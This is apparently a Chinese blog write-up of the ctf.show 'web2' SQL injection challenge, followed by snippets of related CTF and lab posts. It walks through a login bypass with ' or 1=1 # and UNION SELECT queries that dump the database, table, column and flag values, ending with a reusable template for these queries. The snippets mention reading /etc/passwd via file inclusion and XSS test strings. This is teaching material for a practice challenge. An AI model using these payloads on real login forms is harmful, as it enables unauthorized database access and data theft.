代码编织梦想

ctf.show web2 最简单的SQL注入

1、一开始的页面
在这里插入图片描述

随便输入用户名和密码看它怎么反应
在这里插入图片描述没报错,只是清空了用户名和密码
题目提示是sql注入,那就用burpsuit抓个包,发送到repeater
在这里插入图片描述点击go
在这里插入图片描述既然是登录的页面,那就用万能密码 ’ or 1=1 #,出现欢迎您,ctfshow,说明登录成功,这里得说明一下username=admin’ or 1=1 #password=123这条语句,#号是注释符,所以后面的语句是被注释掉的,所以剩下username=admin’ or 1=1,or是只要满足一个条件就可以,1=1永远是满足的
在这里插入图片描述那现在就判断有多少字段,’ or 1=1 union select 1,2,3 #,出现欢迎你,说明有三个字段
现在要做顺序就是爆库,爆表,爆字段,爆值
爆库
username=admin’ or 1=1 union select 1,database(),3 #$password=123
在这里插入图片描述爆表
username=admin’ or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“web2”#&password=123
在这里插入图片描述爆字段
username=admin’ or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=“flag”#&password=123
在这里插入图片描述爆值
username=admin’ or 1=1 union select 1,flag,3 from flag#&password=123
在这里插入图片描述flag{c4728289-7cd0-43c6-8b2f-f1f4a98a4e97}

这里我总结一下,因为这里的数据库为mysql,爆库、爆表、爆字段、爆值都是那几条语句
爆库:

union select 1,2,3,database(); #   //这里得看有多少字段

爆表:

union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database(); #   

爆字段:

union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="表名"; #   

爆值:

union select 1,2,3,字段 from 表名; #   

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/m0_46412682/article/details/107301354

xss-lab(1-5)关卡笔记-爱代码爱编程

文章目录 (一)XSS(二)xss-lab(三)关卡笔记第一关第二关第三关第四关第五关第6-10关 (一)XSS XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript

SQL注入之宽字节注入-爱代码爱编程

个人觉得宽字节注入还挺简单,就是GBK编码问题,我们可以来一点点分析 什么是宽字节? GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节,实际上只有两字节。宽字节带来的安全问题主要是吃ASCII字符(一字节)的现象。 我们以GBK编码为例进行讲解: 尽管现在呼吁所有的程序都使用unicode编码,所

XSS靶场之xss-lab(1-5)关卡笔记-爱代码爱编程

文章目录 (一)XSS(二)xss-lab(三)关卡笔记第一关第二关第三关第四关第五关 (一)XSS XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到h

ctf.show web3 文件包含+php伪协议+命令执行-爱代码爱编程

ctf.show web3 php伪协议+文件包含+命令执行 题目的提示:一开始的页面:看到这个语句,那就是文件包含了,先试下file:etc/passwd,有反应试下有没有flag.txt文件,好像没有这个文件那现在我们利用php伪协议 php://input post提交命令,这里不知道为什么我用hackerbar post提交没有反应,那只能bur

xss-lab(6-10)关卡笔记-爱代码爱编程

文章目录 关卡笔记第1-5关第六关第七关第八关第九关第十关 关卡笔记 第1-5关 xss-lab(1-5)关卡笔记 第六关 该关卡显示一个输入框,根据输入框的输入内容显示“没有找到和某某某的相关的结果” 首先仍然和之前五个关卡一样,尝试输入测试语句 <script>alert(1)</script> 可以发

OWASP Security Shepherd靶场攻略-Lessons篇-爱代码爱编程

OWASP Security Shepherd靶场攻略-Lessons篇 1.Broken Session Management(会话管理): 题目要求:研究下面的函数,是否欺骗服务器认为已经完成了本课程,返回key。 测试步骤: 拦截请求,做如图所示更改,获得key 提交key值:2.Cross Site Scripting(跨站脚本攻击): 题目要求